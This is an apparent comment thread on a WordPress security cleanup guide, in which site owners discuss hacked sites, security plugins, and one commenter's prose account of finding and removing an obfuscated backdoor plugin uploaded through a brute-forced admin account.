Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.
If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.
Hi Steve,
No worries, I’m past that moment of being in panic. 😉
I also pretty much gone through a whole set of security improvements.
Wordfence isn’t my cup of tea. It didn’t really do anything to protect my website, so I’ve moved on to something better: WP Cerber. I’m content with this plugin but we’ll see what the future holds.
That being said, I want to know more about this leak and looking for someone who recognize this type of hack or has been in a similar situation.
A site I created was hacked much like yours, odd .php files etc.
– I got the creation dates+times of the rogue files and directories.
– I went to the access logs and looked at what has happening at these times, I also have a journal file of user logins, this let me put together the full story.
The bottom line was that an administrator account was hacked using a user + password scanner.
The hackers uploaded their own plugin, the plugin was highly obscured using lots of base64 and rot13 functions, what it did was an “eval” on whatever [POST] parameters passed to their plugin loaded file. Since POST data is not logged I have no clue what they did. Of course I could see which files they were accessing.
I disabled the hacked admin user login, renamed their plugin directory, took the website offline by renaming the website root directory.
Rebuilt the website, scanned the database for weird stuff and reloaded it.
Months later I still get hundreds of login attempts a day that trip lockouts.
